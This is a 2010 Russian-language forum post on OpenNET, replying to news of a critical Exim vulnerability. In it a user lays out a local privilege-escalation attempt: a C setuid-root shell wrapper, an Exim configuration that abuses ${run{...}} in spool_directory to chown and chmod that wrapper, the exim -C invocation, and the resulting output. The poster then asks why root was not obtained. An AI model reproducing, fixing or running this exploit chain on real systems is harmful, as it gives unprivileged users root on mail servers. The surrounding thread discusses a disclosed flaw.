The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]



"В Exim обнаружена критическая уязвимость, позволяющая получи..."
Версия для распечатки Пред. тема | След. тема
Форум Разговоры, обсуждение новостей
Исходное сообщение [ Отслеживать ]
Подсказка: Второй уровень иерархии тем в форуме реализован через вкладку "Показ ключевых тем".
. "В Exim обнаружена критическая уязвимость, позволяющая получи..." +/
Сообщение от pvgemail (?), 09-Дек-10, 21:59 
делаем от себя простого  юзера
[pvg@c]$ id
uid=231(pvg) gid=500(pvg) группы=500(pvg)

int main(int argc, char *argv[])
{
setuid(0);
setgid(0);
setgroups(0, 0);
execl("/bin/sh", "sh", 0);
}

gcc -o setuid setuid.c

cat c.conf
[pvg@c]$ cat c.conf
spool_directory = ${run{/bin/chown \
root:root /home/pvg/c/setuid}}${run{/bin/chmod 4755 /home/pvg/c/setuid}}
[pvg@c]$ /usr/sbin/exim -Cc.conf -q
2010-12-09 21:44:50 Failed to create directory "": No such file or directory
[pvg@c]$ ls -l
итого 20
-rw-rw-r--    1 pvg      pvg           110 Дек  9 21:39 c.conf
-rwsr-xr-x    1 pvg      pvg         11915 Дек  9 21:40 setuid
-rw-rw-r--    1 pvg      pvg           103 Дек  9 21:36 setuid.c

ииии получаем.....
а где root????.... бит s вижу, а рута нет
где ошибка??????????

Ответить | Правка | Наверх | Cообщить модератору

Оглавление
В Exim обнаружена критическая уязвимость, позволяющая получи..., opennews, 09-Дек-10, 17:47  [смотреть все]
Форумы | Темы | Пред. тема | След. тема



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру